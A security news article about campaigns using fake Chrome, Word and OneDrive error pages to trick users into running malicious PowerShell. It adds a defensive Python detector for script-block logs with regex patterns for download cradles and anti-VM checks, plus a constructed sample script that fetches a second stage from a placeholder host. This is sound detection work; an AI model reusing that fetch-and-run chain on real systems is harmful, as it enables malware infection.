Fake Google Chrome and Microsoft Word Alerts Spread Malware via PowerShell Commands

Jun 18, 2024 | News


Malware Campaign Exploits Fake Chrome, Word, and OneDrive Errors to Deploy Malware

A new malware distribution campaign has been discovered using fake error messages from Google Chrome, Microsoft Word, and OneDrive to trick users into running malicious PowerShell scripts. This campaign has been attributed to multiple threat actors, including ClearFake, a new attack cluster called ClickFix, and the well-known TA571 threat actor, according to cybersecurity firm Proofpoint.

ClearFake attacks are notorious for employing website overlays that prompt users to install fake browser updates. The new campaign follows a similar approach but now includes deceptive error messages. These errors urge users to click a button to copy a PowerShell “fix” script into their clipboard and execute it via the Run dialog or PowerShell prompt.

Despite requiring significant user interaction, the social engineering tactics are sophisticated enough to convince users they are addressing legitimate issues, thereby prompting them to take potentially harmful actions.


PowerShell “Fix” Leads to Malware Infections

Proofpoint analysts identified three distinct attack chains, each varying slightly in their initial stages. However, the subsequent stages consistently lead to malware infections. The payloads delivered through these attacks include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer.

In the first attack chain, linked to ClearFake, users visiting compromised websites encounter a fake Google Chrome warning about a webpage display issue. The warning instructs users to copy a PowerShell script to install a “root certificate” and run it with administrative privileges.

[Figure: Fake Google Chrome error. Source: Proofpoint]

Executing this script triggers a series of actions:

  • Flushing the DNS cache.
  • Removing clipboard content.
  • Displaying a decoy message.
  • Downloading and executing additional payloads after performing anti-VM checks.
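The four actions above are each unremarkable on their own (administrators flush the DNS cache and write to the clipboard all the time), so the useful detection signal is their co-occurrence inside a single pasted script. The following is an added example written for this page, not code from Proofpoint, BleepingComputer or the campaign: it scores Windows PowerShell Script Block Logging records (Event ID 4104, a real event) against one regex per described behaviour and flags a record when several fire together. The record layout, the sample script blocks, the host names, the `placeholder.invalid` URL and the threshold of 3 are all constructed assumptions for illustration.

```python
import re

# One regex per behaviour the article attributes to the pasted "fix" script.
# Any single hit is ordinary admin activity; the combination is the signal.
BEHAVIOURS = {
    # "Flushing the DNS cache"
    "dns_flush": re.compile(r"ipconfig\s*/flushdns|Clear-DnsClientCache", re.I),
    # "Removing clipboard content" (the lure put the script there to begin with)
    "clipboard_wipe": re.compile(r"Set-Clipboard|Windows\.Forms\.Clipboard\]::Clear", re.I),
    # "Displaying a decoy message"
    "decoy_message": re.compile(
        r"MessageBox\]::Show|Write-Host\s+['\"][^'\"]*(fix|certificate|success)", re.I),
    # "anti-VM checks" (hardware/model probing; the exact form is an assumption)
    "anti_vm": re.compile(r"Win32_ComputerSystem|Win32_BIOS|VMware|VirtualBox|Hyper-V", re.I),
    # "Downloading and executing additional payloads"
    "download_stage": re.compile(
        r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadString|DownloadFile"
        r"|Net\.WebClient|Start-BitsTransfer", re.I),
}


def match_behaviours(script_block: str) -> list[str]:
    """Return the names of every behaviour regex that fires on one script block."""
    return [name for name, rx in BEHAVIOURS.items() if rx.search(script_block)]


def is_suspicious(script_block: str, threshold: int = 3) -> bool:
    """Flag a block once enough of the described behaviours co-occur in it.

    The threshold is an assumed tuning value, not something from the reporting;
    lower it for high-value hosts, raise it if admin tooling generates noise.
    """
    return len(match_behaviours(script_block)) >= threshold


def triage(records, threshold: int = 3):
    """Yield (record, matched behaviours) for each 4104 record worth an analyst's look."""
    for rec in records:
        if rec.get("event_id") != 4104:      # only script block logging events carry the text
            continue
        hits = match_behaviours(rec["script_block"])
        if len(hits) >= threshold:
            yield rec, hits


# Constructed sample records (simplified SIEM shape); none is from the campaign.
SAMPLE_RECORDS = [
    # routine troubleshooting: one behaviour only, must not alert
    {"event_id": 4104, "host": "ws-01",
     "script_block": "ipconfig /flushdns; Clear-DnsClientCache"},
    # the described chain: flush, clipboard wipe, decoy, VM check, download stage
    {"event_id": 4104, "host": "ws-02",
     "script_block": ("ipconfig /flushdns; Set-Clipboard -Value ''; "
                      "[System.Windows.MessageBox]::Show('Root certificate installed'); "
                      "$m = (Get-CimInstance Win32_ComputerSystem).Model; "
                      "if ($m -notmatch 'Virtual') { "
                      "(New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage2') }")},
    # a process-creation event: no script text, skipped by triage
    {"event_id": 4688, "host": "ws-03", "script_block": ""},
]

if __name__ == "__main__":
    for rec, hits in triage(SAMPLE_RECORDS):
        print(f"{rec['host']}: {len(hits)} behaviours co-occur -> {', '.join(hits)}")
```

Two practical caveats: Event ID 4104 only contains the script text if Script Block Logging is enabled via Group Policy, so confirm that before relying on it; and because the lure has the victim paste the command into the Run dialog (Win+R), Explorer also records the pasted text under the per-user `RunMRU` registry key, which gives a second, log-independent place to look for the same patterns during forensics (a standard Windows artifact, not something the article itself mentions).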


[Figure: The 'ClearFake' attack chain. Source: Proofpoint]

The second attack chain, attributed to the ClickFix campaign, involves injecting an iframe into compromised websites to display another fake Google Chrome error. Similar to the first chain, users are directed to run a PowerShell script, leading to the same malware infections.

The third attack chain utilizes email-based tactics, where HTML attachments resembling Microsoft Word documents prompt users to install the “Word Online” extension. The error message provides “How to fix” and “Auto-fix” options, both leading to the execution of malicious PowerShell commands or the download of harmful files.

[Figure: Fake Microsoft Word error leads to malware. Source: Proofpoint]

Exploiting User Trust and System Vulnerabilities

The threat actors exploit users’ lack of awareness regarding the risks associated with executing PowerShell commands. They also take advantage of Windows’ inability to detect and block these malicious actions effectively.

The different attack chains indicate that TA571 is experimenting with various methods to enhance their campaign’s effectiveness and broaden their infection pathways. By leveraging fake error messages and sophisticated social engineering, these attackers aim to compromise as many systems as possible, posing a significant threat to users worldwide.


Source: bleepingcomputer.com
